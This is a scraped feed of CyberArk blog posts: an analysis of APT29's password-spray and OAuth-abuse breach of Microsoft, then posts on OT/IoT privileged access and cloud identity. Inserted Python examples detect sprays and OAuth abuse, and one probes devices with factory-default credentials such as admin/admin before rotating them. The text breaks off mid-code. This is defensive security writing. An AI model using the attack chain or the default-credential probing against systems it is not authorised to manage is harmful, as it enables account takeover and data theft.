A new and concerning chapter has unfolded in these troubled times of geopolitical chaos. The Cozy Bear threat actor has caused significant breaches targeting Microsoft and HPE, and more are likely to come. These recent events have sent shockwaves throughout the tech community, and for good reason. As we continue to uncover the fallout from these breaches, it has become apparent that the magnitude of the incident is more significant than we first realized. Today’s blog post sheds light on who exactly APT29 is, its motives, what tactics it continues to use – and ultimately, how organizations might prevent similar attacks from happening to them.

Who’s Behind the Microsoft Attack and Why?

The U.S. government has classified this threat actor as the advanced persistent threat APT29. The group also goes by many other names, such as CozyCar, The Dukes, CozyDuke, Midnight Blizzard (as Microsoft calls them), Dark Halo, NOBELIUM and UNC2452. Most people, however, know it by the moniker Cozy Bear. This group has rightfully earned a reputation as one of the world’s most advanced and elusive espionage groups.

In reviewing security camera footage, the Dutch government determined that the Russian Foreign Intelligence Service (or SVR) led this group. APT29’s primary objectives include acquiring political, economic and military intelligence to gain a competitive advantage, supporting geopolitical goals and enhancing Russia’s influence on the global stage. The group’s long-term and covert approach reflects its commitment to achieving sustained access to sensitive information, allowing it to conduct strategic operations over an extended period.

Industry experts generally agree that this threat actor formed in 2008 and has been targeting government entities, think tanks and critical infrastructure since 2010. Cozy Bear has since been linked to several high-profile cyber-attacks, including the 2016 breach of the Democratic National Committee (DNC), the SolarWinds supply chain attack of 2019 and the 2021 breach of the Republican National Committee (RNC). This threat actor is known to be extremely patient and cautious. Cozy Bear sometimes dwells inside a network for years if the target is valuable enough.

Quick aside: An interesting thing to note is that the SolarWinds breach was the first time an attack method called Golden SAML was documented in the wild. The attack method was first discovered by CyberArk Labs’ Shaked Reiner in 2017.

What Happened to Microsoft (What We Know So Far)

On Jan. 12, Microsoft detected a threat actor who gained access to a small percentage of corporate email accounts, exfiltrated emails and attached documents of high-value targets, including those of senior leadership, cybersecurity and legal teams, along with other internal employee identities.

Based on the details provided by Microsoft at the time of this writing, it appears the initial objective of the attack was to acquire information. Once inside target email accounts, Cozy Bear searched for specific information about, well, Cozy Bear. The group likely wanted to better understand its adversary (the intelligence teams gathering information on it) and discover the countermeasures intended to lure and stop it. Examples of what the threat actor might be interested in include indicators of compromise (IoC), exposed cloud infrastructure used by the attacker, IP ranges and known tactics, techniques and procedures (TTPs).

Analyzing the Microsoft Breach

Based on the information provided by Microsoft on Jan. 19, it appears the threat actor gained access to a “legacy, non-production test tenant account” through a password spray attack.

Password spraying is a brute-force attack in which the attacker slowly tries a list of passwords against many accounts from various source IP addresses. This simple attack keeps the number of requests below the rate limits and lockout thresholds meant to stop rapid login attempts from a single IP address. Because no account accumulates enough failed logins to be locked out, the attacker avoids a common identity threat detection and response (ITDR) capability offered in access management and privileged access management (PAM) solutions. This type of attack is significantly slower but much more difficult to detect. Consequently, password spraying has a much higher chance of succeeding.

Using this technique, the attacker compromised and accessed the account. The question that comes to mind is, if this was publicly facing, why was multi-factor authentication (MFA) not part of the authentication flow?

In this situation, the permission set was limited. However, the test account had access to an OAuth application that had elevated access into Microsoft’s corporate environment. Although this was deemed a “legacy” account, it was still authorized to access production systems. This coverage gap is a familiar blind spot for many organizations; even with great technical controls to implement least privilege access, people and processes (such as ongoing entitlement reviews) remain essential elements of identity security programs.

At this point, the attacker created a series of malicious OAuth applications that enabled them to have multiple hooks into the target, providing higher persistence while making the defender’s job even harder. Afterward, the threat actor created a new user account to grant access to the Microsoft corporate environment for the other newly created and malicious OAuth applications. Then, the attacker used the initial compromised legacy test OAuth application to grant the newly created OAuth apps the Office 365 Exchange Online *full_access_as_app* role. This role typically grants extensive access and privileges to an application – which, in this case, allowed access to target mailboxes.

The granted privilege here is meaningful because it enabled the adversary to read and exfiltrate emails and attachments. This unauthorized connection was accomplished by generating valid access tokens for Microsoft’s Exchange server, even though the original user was not allowed to do so.

Surmised Microsoft Attack Flow

[Graphic: Microsoft Attack Flow]

The graphic above charts APT29’s steps:

  1. Performed reconnaissance to identify potential victims (e.g., through LinkedIn, OSINT).
  2. Performed a password spraying attack against the entities identified in step 1.
  3. Accessed the compromised account (legacy test tenant).
  4. Escalated privileges by accessing an OAuth application with elevated privileges to the corporate environment.
  5. Created a few malicious OAuth applications.
  6. Created a new user account to grant consent in the Microsoft corporate environment for the malicious apps created in step 5.
  7. Granted the malicious apps Office 365 Exchange Online *full_access_as_app* role using the credentials gained from step 4.
  8. Read and exfiltrated emails belonging to Microsoft’s executive leadership team and security staff.

Prerequisite Misconfiguration Assumptions

Based on the information disclosed, we assume that certain misconfigurations were present:

  • Access to an OAuth application with elevated permissions to the internal environment.
  • Privileges allowing the creation of OAuth apps and users.
  • Privileges for reading emails.

It’s also worth mentioning that even though this attack created limited practical impact (stolen emails and file attachments), it can still escalate damage through various other paths, such as the exfiltration of regulated data or the disruption of systems.

What Your Organization Can Do to Help Prevent a Similar Attack

Protect Your Non-production Environments

One common mistake IT organizations make is exposing under-protected development environments to the internet, which gives threat actors a way in. These environments should be segmented and not easily accessible from outside an organization’s perimeter. Organizations should extend the cybersecurity controls used in production environments into non-production environments; failure to follow this best practice causes data breaches.

Another common mistake I see organizations make is using unsanitized data in test environments, allowing easy exfiltration. End user emails and attachments were not present in the legacy tenant. Still, Microsoft admitted it used the same credentials in its production environment and in this legacy tenant. The threat actor’s ability to pivot and access production data resulted from the reuse of privileged credentials and the absence of segmentation between non-production and production environments.

Because organizations cannot implicitly trust that best practices are adhered to by the people implementing the environments, we need to extend multiple controls, such as MFA, to environments outside of production. Everyone knows that MFA is important. That said, many organizations, including one of the largest tech giants in the world, didn’t use it correctly, at least in this case. Additionally, we must assume that systems are not always set up securely. Misconfigurations and over-provisioned accounts are inevitable, which is why we preach taking a defense-in-depth approach to cybersecurity. Extending controls like least privilege and MFA to non-production environments is incredibly important.

Implement Identity Threat Detection and Response (ITDR)

The APT29 attack on Microsoft is a textbook example of how ITDR is critical to an organization.

From the initial access through a password spray using a proxy, to the absence of MFA, to the creation of privileged OAuth applications and finally the creation of a user account with a sensitive privilege, every one of these actions had the potential for detection and response.

Like every element of cybersecurity, ITDR capabilities are more effective when tightly integrated into an identity fabric that proactively reduces risk rather than waiting for an attack to be detected. CyberArk Labs is working on a project in the ITDR world, and we are pleased to share that our suggested ITDR list of rules covers most aspects of the attack.

Defenders should re-evaluate the effectiveness of their password spray detections against the “low volume” style of attack described above. The focus on OAuth emphasizes the importance of such detections and the need for a comprehensive ITDR solution covering both on-prem and cloud aspects.
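To make the “low volume” point concrete, the following added example (not code from the post or from CyberArk) runs two rules over a constructed sign-in log shaped like the spray described earlier: a classic per-account failure threshold, which never fires, and a rule that counts how many distinct accounts fail inside one window regardless of source IP, which does. Log format, account names and addresses are all made up.

```python
"""Low-volume password spray detection over sign-in events.

Added example, not code from the post: a per-account lockout rule misses a
spray that stays under its threshold, while a rule that counts how many
distinct accounts fail inside one window (regardless of source IP) catches it.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_log():
    """Constructed sign-in log (not real data): 12 accounts, two failed attempts
    each, rotated across 8 source addresses, one attempt every 10 minutes, then
    a failure and a success on a legacy test account."""
    base = datetime(2024, 1, 10, 2, 0, 0)
    ips = [f"198.51.100.{n}" for n in range(10, 18)]        # TEST-NET-2 range
    users = [f"user{i:02d}@corp.example" for i in range(12)]
    lines, attempt = [], 0
    for _ in range(2):                                       # two passwords per account
        for user in users:
            ts = base + timedelta(minutes=10 * attempt)
            lines.append(f"{ts.isoformat()} {user} {ips[attempt % len(ips)]} FAILURE")
            attempt += 1
    ts = base + timedelta(minutes=10 * attempt)
    lines.append(f"{ts.isoformat()} legacy-test@corp.example {ips[0]} FAILURE")
    ts += timedelta(minutes=10)
    lines.append(f"{ts.isoformat()} legacy-test@corp.example {ips[1]} SUCCESS")
    return lines


def parse(lines):
    """Each line: ISO timestamp, account, source IP, FAILURE|SUCCESS."""
    events = []
    for line in lines:
        ts, user, ip, result = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "user": user,
                       "ip": ip, "result": result})
    return events


def lockout_alerts(events, threshold=5, window=timedelta(minutes=15)):
    """Classic rule: one account fails `threshold` times within `window`.
    Returns the set of accounts that would have been flagged or locked out."""
    recent = defaultdict(list)
    flagged = set()
    for e in sorted(events, key=lambda x: x["ts"]):
        if e["result"] != "FAILURE":
            continue
        kept = [t for t in recent[e["user"]] if e["ts"] - t <= window]
        recent[e["user"]] = kept + [e["ts"]]
        if len(recent[e["user"]]) >= threshold:
            flagged.add(e["user"])
    return flagged


def detect_spray(events, window=timedelta(hours=6), min_accounts=10, max_per_account=4):
    """Spray rule: at least `min_accounts` distinct accounts fail inside `window`
    while no single account exceeds `max_per_account` failures (the attacker is
    deliberately staying under the lockout threshold). Returns a summary of the
    widest matching window, including sprayed accounts that later signed in."""
    fails = sorted((e for e in events if e["result"] == "FAILURE"), key=lambda x: x["ts"])
    best, start = None, 0
    for end in range(len(fails)):
        while fails[end]["ts"] - fails[start]["ts"] > window:
            start += 1
        bucket = fails[start:end + 1]
        per_user = defaultdict(int)
        for f in bucket:
            per_user[f["user"]] += 1
        if len(per_user) >= min_accounts and max(per_user.values()) <= max_per_account:
            if best is None or len(per_user) > best["accounts"]:
                # A later successful sign-in on a sprayed account is the
                # "compromised account" signal worth escalating first.
                later_success = {e["user"] for e in events
                                 if e["result"] == "SUCCESS" and e["user"] in per_user
                                 and e["ts"] >= bucket[0]["ts"]}
                best = {
                    "window_start": bucket[0]["ts"],
                    "accounts": len(per_user),
                    "source_ips": len({f["ip"] for f in bucket}),
                    "max_failures_per_account": max(per_user.values()),
                    "compromised": sorted(later_success),
                }
    return best


if __name__ == "__main__":
    evts = parse(build_sample_log())
    print("lockout rule flagged:", lockout_alerts(evts) or "nothing")
    print("spray rule:", detect_spray(evts))
```

Tune `min_accounts` and `window` to the tenant’s normal failed-login baseline; the per-account cap is what distinguishes a spray from a targeted brute force against one user.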

An additional line of defense includes having controls to prevent credential reuse and to rotate all credentials consistently according to organizational policy. Finally, detecting the entry of risky commands could have further reduced the risk of this attack by limiting lateral and vertical movement.

Security teams should carefully review every impersonation action between non-human and human entities. Require administrative privileges for the OAuth application approval process (Consent).

Suggested ITDR Detections and Responses

The following recommendations correspond to password spraying attacks, OAuth abuse and other malicious actions. Monitor for the following events:

  • Login without MFA (with an automated response)
  • Reuse of authentication credentials (with forced rotation in response)
  • Suspicious creation or reactivation of OAuth applications
  • Idle activity of an OAuth application
  • New admin privileges granted to a user, correlated with any deviation from the approved organizational process for changing or adding privileges (e.g., an IT support ticket must be opened, or the user must re-authenticate with MFA)
  • Activity of a user without a prior explicit user authentication (or session start event)
  • Behavior of an MFA-configured user without a prior MFA check
  • Attempted actions that failed because the credentials, tokens or cookies used had already expired
  • Entry of malicious commands
  • Attempts to bypass privileged access management solutions
  • User login through a proxy
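The OAuth-related items in this list (suspicious application creation, new privileges granted outside the approved process, activity without a prior sign-in or MFA check, and non-human entities impersonating or granting rights to one another) can be correlated from a directory audit trail. The following added example is not CyberArk’s or Microsoft’s code: it replays a constructed audit log shaped like the surmised attack flow above and flags each step. Operation names, field names and the `full_access_as_app` role check are assumptions for illustration, not any real product’s schema.

```python
"""Correlating OAuth-abuse signals from a directory audit log.

Added example (not code from the post). Event fields and operation names are
assumed for illustration; a real SIEM would map its own audit schema to them.
"""
import json
from datetime import datetime, timedelta

# Constructed audit events (not real data), one JSON object per line, ordered
# like the attack flow in the post: a compromised legacy test account creates
# apps and a helper user, the helper user consents, and an existing app grants
# the new apps the full_access_as_app role. The last two lines are a benign
# admin change made with MFA, which should stay quiet.
AUDIT_LOG = """
{"ts":"2024-01-12T03:00:00","op":"UserLoggedIn","actor":"legacy-test@corp.example","actor_type":"user","target":"legacy-test@corp.example","mfa":false}
{"ts":"2024-01-12T03:05:00","op":"Add application","actor":"legacy-test@corp.example","actor_type":"user","target":"mail-sync-helper"}
{"ts":"2024-01-12T03:06:00","op":"Add application","actor":"legacy-test@corp.example","actor_type":"user","target":"report-export"}
{"ts":"2024-01-12T03:10:00","op":"Add user","actor":"legacy-test@corp.example","actor_type":"user","target":"svc-consent@corp.example"}
{"ts":"2024-01-12T03:12:00","op":"Consent to application","actor":"svc-consent@corp.example","actor_type":"user","target":"mail-sync-helper"}
{"ts":"2024-01-12T03:15:00","op":"Add app role assignment to service principal","actor":"legacy-test-app","actor_type":"servicePrincipal","target":"mail-sync-helper","role":"full_access_as_app"}
{"ts":"2024-01-12T03:16:00","op":"Add app role assignment to service principal","actor":"legacy-test-app","actor_type":"servicePrincipal","target":"report-export","role":"full_access_as_app"}
{"ts":"2024-01-12T08:55:00","op":"UserLoggedIn","actor":"admin@corp.example","actor_type":"user","target":"admin@corp.example","mfa":true}
{"ts":"2024-01-12T09:00:00","op":"Add app role assignment to service principal","actor":"admin@corp.example","actor_type":"user","target":"hr-integration","role":"User.Read.All"}
"""

HIGH_PRIVILEGE_ROLES = {"full_access_as_app"}   # the Exchange Online role named in the post
PRIVILEGED_OPS = {"Add application", "Add user", "Consent to application",
                  "Add app role assignment to service principal"}


def parse_audit(text):
    events = [json.loads(line) for line in text.strip().splitlines()]
    for e in events:
        e["ts"] = datetime.fromisoformat(e["ts"])
    return events


def detect_oauth_abuse(events, window=timedelta(hours=24)):
    """Return one alert dict per rule hit. Rules, mapped to the list above:
    activity_without_prior_signin    - user acts with no preceding sign-in event
    privileged_change_without_mfa    - directory change by a user whose session lacks MFA
    consent_by_newly_created_user    - consent granted by an account created within `window`
    new_app_granted_high_privilege   - high-privilege role on an app created within `window`
    app_granting_app_privilege       - a service principal (not a human) grants the role
    """
    alerts, app_created, user_created, signin_mfa = [], {}, {}, {}

    def alert(rule, e):
        alerts.append({"rule": rule, "ts": e["ts"], "actor": e["actor"], "target": e["target"]})

    for e in sorted(events, key=lambda x: x["ts"]):
        op = e["op"]
        if op == "UserLoggedIn":
            signin_mfa[e["actor"]] = bool(e.get("mfa"))   # remember whether MFA was done
            continue
        if e["actor_type"] == "user":
            if e["actor"] not in signin_mfa:
                alert("activity_without_prior_signin", e)
            if op in PRIVILEGED_OPS and not signin_mfa.get(e["actor"], False):
                alert("privileged_change_without_mfa", e)
        if op == "Add application":
            app_created[e["target"]] = e["ts"]
        elif op == "Add user":
            user_created[e["target"]] = e["ts"]
        elif op == "Consent to application":
            created = user_created.get(e["actor"])
            if created is not None and e["ts"] - created <= window:
                alert("consent_by_newly_created_user", e)
        elif op == "Add app role assignment to service principal":
            if e.get("role") in HIGH_PRIVILEGE_ROLES:
                created = app_created.get(e["target"])
                if created is not None and e["ts"] - created <= window:
                    alert("new_app_granted_high_privilege", e)
                if e["actor_type"] == "servicePrincipal":
                    alert("app_granting_app_privilege", e)
    return alerts


if __name__ == "__main__":
    for a in detect_oauth_abuse(parse_audit(AUDIT_LOG)):
        print(a["ts"].isoformat(), a["rule"], a["actor"], "->", a["target"])
```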

The Time to Act is Now (and Always)

This recent attack on Microsoft is a stark reminder of the persistent and sophisticated threats from nation-state threat actors. And it isn’t likely the last we’ll see from Cozy Bear. Days after Microsoft’s breach announcement, other organizations have also announced they had fallen victim to this threat actor. CyberArk Labs expects that more attacks will continue to become public now that these indicators of compromise are available to everyone. It’s also essential to acknowledge that the threat landscape is not limited to a single actor or nation. Other states are actively developing and refining their cyber capabilities, ready to launch similar attacks with varying motives.

The attack is also a sobering glimpse into the future of cyber warfare. It serves as a call to action for heightened vigilance, collaboration and investment in cybersecurity. The looming specter of nation-state cyberattacks demands our attention, and the time to fortify ourselves is now. Ignoring these warnings would be to our peril. As a global community, we must work collectively to safeguard our digital infrastructure from the growing threat of nation-state cyber aggression.

Andy Thompson is CyberArk Labs’ Offensive Security Research Evangelist.

Editor’s note: For more insights from CyberArk Labs’ Andy Thompson on this subject and beyond, check out his appearance on CyberArk’s Trust Issues podcast episode, “Behind the Data Breach: Dissecting Cozy Bear’s Microsoft Attack.” The episode is available on most major podcast platforms.

Redefining PAM to Secure OT and IoT Devices
https://www.cyberark.com/blog/redefining-pam-to-secure-ot-and-iot-devices/
Tue, 06 Feb 2024 23:51:17 +0000

Left to their own devices, your organization’s devices can be a significant source of risk. Consider operational technology (OT), which is crucial for organizations but is not engineered and operated with a security-first mindset. Often, OT systems are beyond the purview of CISOs and are focused on meeting key objectives for system uptime and efficiency – leaving them vulnerable. Attackers seek to exploit human and non-human identities with high-risk access, including:

  • Devices used by third-party vendors that often remotely operate and service their client organizations’ OT systems.
  • Devices used by employees whose access to applications or endpoints leading into OT is protected only by passwords, which are easily compromised through phishing or credential-stealing malware.
  • Devices embedded with machine identities with high-risk access to data and infrastructure, such as industrial control systems (ICS) and SCADA systems.

Outside of OT are Internet of Things (IoT) devices: smart thermostats and lightbulbs, wearables and connected security cameras. What do these device categories across OT, IoT and ICS have in common? The risk that comes with interconnectivity.

One compromised identity can let attackers install malware that gives them control over OT or IoT devices, often with devastating outcomes: shutting down a manufacturer’s equipment, breaking regulatory compliance or conscripting IoT devices into a botnet for a widespread DDoS attack that also knocks those devices offline. These technologies are crucial to business operations, which is exactly what makes them appealing to attackers.

Understanding the Risks Embedded in OT and IoT Devices

Attackers have always sought to exploit privileged access, and now they’ve broadened their view of privilege. Securing this access remains critical, but now attackers know they can chart a similar attack path by exploiting human and non-human identities within OT environments and IoT devices. It is vitally important to know the status of all the devices on your network and take actionable steps to protect them from potential attacks.

According to the Microsoft Digital Defense Report 2023 (MDDR), 25% of OT devices run unsupported operating systems, making them more susceptible to attack. Traditionally, organizations separated OT from the internet by “air-gapping” these devices. But growing interconnectedness, even in once-air-gapped environments, has created new threats to business continuity, and protection now has to go beyond the foundational practices that once sufficed for OT security.

In 2022, transportation, discrete manufacturing, and food and beverage were the top three targeted sectors, and interdependencies between IT and OT systems were the main factor behind that targeting. The consequences of cyberattacks on OT systems are significant and growing: 2023 brought more attacks and more sophisticated ones, with “More than 80% of the OT/ICS incidents started with an IT system compromise attributed to increased interconnectivity…”

Why It’s Essential to Redefine Your PAM Program for OT and IoT Threats

OT security faces many challenges: aging, fragile technology; operating systems and software that are no longer supported; and long device lifespans, which means known vulnerabilities can persist for years. There is also an opportunity to improve and prepare before it’s too late. Organizations must redefine their PAM programs to secure a broader set of identities with high-risk access.

While OT and IoT are inherently different, these devices have common ground from a security perspective. Let’s look at three core areas of risk and how to reduce that risk when securing the broader ecosystem of unmanaged or loosely connected devices, including OT, IoT devices, and ICS.

1. Discovery of Devices and Firmware Updates

Privileged access management (PAM) programs should continuously discover and onboard new devices and accounts when added to your network(s), enhancing control and oversight. These accounts and the credentials used to run your organizational devices and assets must be securely managed and rotated, especially away from default passwords.

Isolating privileged sessions so they can be monitored and recorded supports continuous compliance reporting. Managing privileged credentials on certain OT devices can be daunting because of environment complexity and limited visibility. Best-in-class PAM solutions let you control and rotate credentials on these devices securely, mitigating unauthorized access, and can work with the gateway that fronts these devices so that credentials are secured, rotated regularly and centrally managed, reducing the risk of credential theft.

It is also crucial to provide credentials safely to the device management tooling that performs firmware updates and patches. Secrets management capabilities store and deliver these credentials on demand, so devices can be kept updated without embedding credentials in the update tooling itself.

2. Gateway and Remote Access Vulnerability

Manage endpoint privileges to secure workstations (with desktop MFA, if possible) and stop the spread of ransomware and malware into OT. Endpoint security should also cover the IT-like systems that sit inside the OT boundary, for example shared workstations on factory floors. Sensitive equipment requires stringent controls over every workstation and server that can reach OT devices over the network.

Utilize an endpoint privilege manager (EPM) to harden the systems, maintain strict endpoint privilege security, and enforce least privilege, reducing the risk of unauthorized changes to critical systems. Ransomware remains the most significant threat to industrial infrastructure, and there’s been an observed shift towards ransomware attacks specifically targeting OT environments.

Many different identities can physically and remotely access IoT devices and OT environments. Ensuring a secure remote connection and advanced controls when these machines are being used is crucial. Remote access capabilities in PAM solutions provide secure access to credential vaults without VPNs, passwords or agents, plus the ability to provide offline access to credentials.

Secure remote access is the vehicle to the vault and the entry point into the OT environment. Apply controls so that vendors or contractors operating in air-gapped environments can retrieve credentials offline securely. Rotate credentials according to organizational policy and sync them to users’ mobile devices while those users are off-site, before they re-enter the offline worksite.

3. Defense in Depth: Paperclip Resets, Unidirectional Gateways and Device Monitoring

Attackers will never stop innovating their methods to exploit credentials and data, but they also use old tricks like the paperclip reset: pressing a device’s recessed reset button restores its factory-default credentials, after which the attacker simply logs in with them and takes over. Look for security-first solutions designed to detect this kind of action and automatically remediate it by rotating the device’s credentials.
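The detect-and-remediate flow just described, together with the “rotate away from default passwords at discovery” step from section 1, can be reduced to one loop: probe each device with its factory-default credential, treat success as evidence of a reset, and rotate immediately. The following is an added example written for this post, not CyberArk code or product logic. The OT device, the PAM vault and the default-credential table are simulated in memory (all assumptions; the device models are hypothetical) so the logic runs offline.

```python
"""Default-credential probe with automatic rotation.

Added example, not CyberArk's code or product logic. The OT device, the PAM
vault and the default-credential table are simulated in memory (assumptions)
so the detect-and-remediate flow runs offline.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed table of factory-default credentials per device model
# (hypothetical models; a real program would draw on vendor documentation).
DEFAULT_CREDENTIALS = {
    "plc-x100": ("admin", "admin"),
    "hmi-panel-7": ("operator", "1234"),
}


def _derive(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)


@dataclass
class SimulatedDevice:
    """Stand-in for an OT device that stores a salted hash of its admin password."""
    device_id: str
    model: str
    _user: str = field(init=False, repr=False)
    _salt: bytes = field(init=False, repr=False)
    _digest: bytes = field(init=False, repr=False)

    def __post_init__(self) -> None:
        self.factory_reset()  # devices ship with the default credential

    def factory_reset(self) -> None:
        """The paperclip reset: credentials return to the factory default."""
        user, password = DEFAULT_CREDENTIALS[self.model]
        self._user, self._salt = user, secrets.token_bytes(16)
        self._digest = _derive(password, self._salt)

    def authenticate(self, user: str, password: str) -> bool:
        return user == self._user and hmac.compare_digest(
            _derive(password, self._salt), self._digest)

    def set_password(self, user: str, old: str, new: str) -> bool:
        if not self.authenticate(user, old):
            return False
        self._salt = secrets.token_bytes(16)
        self._digest = _derive(new, self._salt)
        return True


@dataclass
class Vault:
    """Stand-in for the PAM vault: device_id -> (user, current password)."""
    entries: dict = field(default_factory=dict)


def _rotate(device: SimulatedDevice, vault: Vault, user: str, current: str) -> None:
    new_password = secrets.token_urlsafe(24)
    if not device.set_password(user, current, new_password):
        raise RuntimeError(f"{device.device_id}: rotation failed")
    vault.entries[device.device_id] = (user, new_password)


def onboard(device: SimulatedDevice, vault: Vault) -> None:
    """Discovery step: a newly found device is moved off its default password."""
    user, default_password = DEFAULT_CREDENTIALS[device.model]
    _rotate(device, vault, user, default_password)


def check_device(device: SimulatedDevice, vault: Vault) -> dict:
    """Probe with the factory default. Success means the device was reset
    (paperclip or otherwise), so rotate immediately and report it."""
    user, default_password = DEFAULT_CREDENTIALS[device.model]
    if device.authenticate(user, default_password):
        _rotate(device, vault, user, default_password)
        return {"device": device.device_id, "status": "RESET_DETECTED", "action": "rotated"}
    vault_user, vault_password = vault.entries.get(device.device_id, (None, None))
    if vault_user is not None and device.authenticate(vault_user, vault_password):
        return {"device": device.device_id, "status": "OK", "action": "none"}
    # Neither the default nor the vaulted credential works: the password was
    # changed outside PAM. Do not guess; escalate for investigation.
    return {"device": device.device_id, "status": "CREDENTIAL_DRIFT", "action": "alert"}


def sweep(devices, vault: Vault) -> list:
    """One monitoring pass over the fleet."""
    return [check_device(d, vault) for d in devices]
```

The third branch matters as much as the first: if neither the default nor the vaulted credential is accepted, someone changed the password outside PAM, and the right action is an alert rather than another rotation attempt that would lock out the legitimate operator.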

Actively observing, analyzing and managing the activities of connected devices and systems is paramount when securing your IoT devices and OT environments. Leading PAM solutions offer identity threat detection and response (ITDR) capabilities such as real-time monitoring, anomaly detection, security event and integrity monitoring, user behavior analytics and regulation compliance monitoring to ensure all interconnected devices are accessed properly by authorized personnel.

Securing the flow of data in OT environments is essential. Integrations with unidirectional gateways (data diodes) from CyberArk’s OT and ICS partners let you monitor for and detect any attempt to bypass PAM, preventing unauthorized access and high-risk account usage while the diode itself physically enforces one-way data flow.

Don’t Forget Visibility for Audits and Compliance

Redefining your PAM program to cover OT and IoT use cases will also satisfy industry-specific audits and compliance regimes such as SOC 2, NIST and NERC CIP, and help you start implementing a Zero Trust architecture. Organizations involved in computer-integrated manufacturing (CIM) or that rely heavily on ICS, whether they follow the Purdue Enterprise Reference Architecture (PERA, the Purdue Model) or the IEC 62443 standard for industrial automation security, will find the same controls apply as Industrial Internet of Things (IIoT) technologies proliferate.

Layering Identity Security for Operational Resilience

According to the Waterfall 2023 Threat Report, adding layers of security improves cyber and operational resilience in manufacturing plants, automation systems, healthcare devices and smart cities. OT and ICS cybersecurity incidents in the last three years have already exceeded the total number reported between 1991 and 2000. Building a comprehensive cybersecurity program does not start and end with IT. Extending identity security beyond the “walls” of IT to strengthen OT lets your organization proactively thwart threats that can impair business-critical operations, disrupt essential services and possibly endanger public health and safety.

Ryne Laster is a product marketing manager at CyberArk.

Editor’s note: Attackers constantly set their sights on any vulnerable part of an organization. To explore how you can build a defense-in-depth approach to securing all human and non-human identities across OT systems, check out our webinar, “13 Ways to Improve OT Security.” And, for a deeper dive into OT cybersecurity and its challenges and opportunities, listen to our Trust Issues podcast conversation with Mike Holcomb, Fellow of Cybersecurity and the ICS/OT Cybersecurity Lead at Fluor. You can check it out in the player below or wherever you get your podcasts.


Elevating Cloud Security With Well-Architected Practices https://www.cyberark.com/blog/elevating-cloud-security-with-well-architected-practices/ Wed, 31 Jan 2024 17:05:12 +0000 https://www.cyberark.com/?p=186951 cloud security architected

It’s said that life truly begins when you step out of your comfort zone. Living in California provides me with many options for hiking and trekking, a perfect backdrop for spending time with nature and enjoying it with friends and family. As a hiking and nature enthusiast, I have done many moderately challenging trails in and around the Bay Area – my comfort zone.

Last year, I decided I needed to get out of my comfort zone and do one of the most challenging hikes in the world, the trek to Everest Base Camp (EBC). The trek spans 10 days and 80 miles through the scenic Himalayas, culminating at 18,000 feet, about half the cruising altitude of a commercial jet. Reaching the summit was incredibly uplifting and gave me a profound sense of accomplishment. However, the preparation and planning for the adventure provided long-standing benefits. Training for Everest propelled me into a disciplined physical routine and diet, adhering to best practices and guardrails that have ensured optimal fitness and enhanced my well-being since.

Climbing the Cloud Transformation Mountain

There are parallels to my experience with the EBC hike in my career leading digital transformation and cloud initiatives for large enterprises and digital-native businesses. Organizations must constantly challenge their comfort zones, particularly when securing their application environments. As large enterprises complete their migration to the cloud and digital native businesses scale their offerings on the cloud, breaking away from their comfort zones by adhering to the well-architected frameworks published by their cloud providers, like AWS, Azure and GCP, becomes imperative. This urgency amplifies with the surge in cloud services and increased threats on cloud workloads due to the rise of artificial intelligence (AI). And this transformation should occur without slowing the pace of delivery.

All cloud providers operate a shared responsibility model with their customers: the provider secures the underlying platform, and it is the customer’s duty to configure and operate within the published guardrails to keep its own cloud environment healthy. Embracing solutions aligned with the well-architected frameworks for security has been my strategic approach throughout this transformative time.

Key Guidelines for Securing Cloud Identities

When building secure and well-architected cloud environments, the following guidelines are essential for securing identities in the cloud:

1. The principle of least privilege (PoLP). Assign the minimum necessary permissions to users, processes and systems to perform their tasks, reducing the risk of unauthorized access. Implementing zero standing privileges (ZSP) and granting just-in-time (JIT) access to roles scoped for least privilege ensures that a user reaching cloud resources through the console or command line interface (CLI) holds only the permissions required, only for the time allocated, and that non-human interactions through APIs (application programming interfaces) are secured the same way.

2. Authentication and authorization. Implement strong authentication mechanisms, such as multi-factor authentication (MFA), and ensure proper authorization controls to manage access to cloud resources effectively. Platforms requiring MFA at login and supporting third-party IdPs to collaborate with existing SSO/MFA solutions can enforce the necessary authorization controls for cloud-native services.

3. Centralized identity management. Use a centralized identity management system for user authentication and authorization, facilitating better control and monitoring of access across your cloud environment. Leveraging a centralized identity management platform that integrates with third-party IdPs ensures complete identity lifecycle management and identity compliance mapping.

4. Credential management. Regularly rotate and manage credentials securely, avoiding hard-coded credentials and utilizing Identity and Access Management (IAM) roles whenever possible. Integrating privileged access management (PAM) capabilities for long-term credentials helps safeguard them.

5. Audit trails and monitoring. Implement robust logging and monitoring for all identity-related events, enabling timely detection and response to security incidents. Leveraging cloud log solutions and cloud monitoring capabilities allows recording and monitoring of user activity within web applications and cloud consoles.

6. Automated compliance checks. Employ automated tools and processes to regularly assess and ensure compliance with security best practices, IAM policies and configurations. Regular reviews of inactive identities, identities with unused privilege permissions, and those with standing privilege permissions are essential.

7. Secure DevOps practices. Integrate security measures into the DevOps pipeline, ensuring that identity and access controls are considered and tested throughout the development lifecycle. Organizations should secure access to a broad range of applications, including COTS applications, bots, automation platforms and CI/CD tools, running in hybrid, cloud-native and containerized environments.
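Guidelines 1 (least privilege with JIT access) and 6 (automated compliance checks) are concrete enough to show in code. The block below is an added example written for this post, not code from the original article or from any CyberArk product. It builds a scoped, self-expiring AWS IAM statement and lints policy documents for the standing, over-broad grants that a ZSP review would flag; the policy documents and the “last accessed” data are constructed, and only the AWS policy grammar (Version, Statement, the DateLessThan operator and the aws:CurrentTime condition key) is real.

```python
"""Least-privilege, time-bound IAM policy generation and a standing-privilege lint.

Added example, not from the original post or any CyberArk product. The policy
documents and the last-accessed data are constructed; only the AWS policy
grammar (Version, Statement, DateLessThan, aws:CurrentTime) is real.
"""
from datetime import datetime, timedelta, timezone


def make_jit_policy(actions, resources, ttl_minutes, now=None):
    """Scoped allow statement that expires on its own. AWS's DateLessThan
    condition on the aws:CurrentTime global key gives the grant a hard end,
    so it cannot become a standing privilege even if nobody revokes it."""
    now = now or datetime.now(timezone.utc)
    expires = (now + timedelta(minutes=ttl_minutes)).strftime("%Y-%m-%dT%H:%M:%SZ")
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Action": sorted(actions),
            "Resource": sorted(resources),
            "Condition": {"DateLessThan": {"aws:CurrentTime": expires}},
        }],
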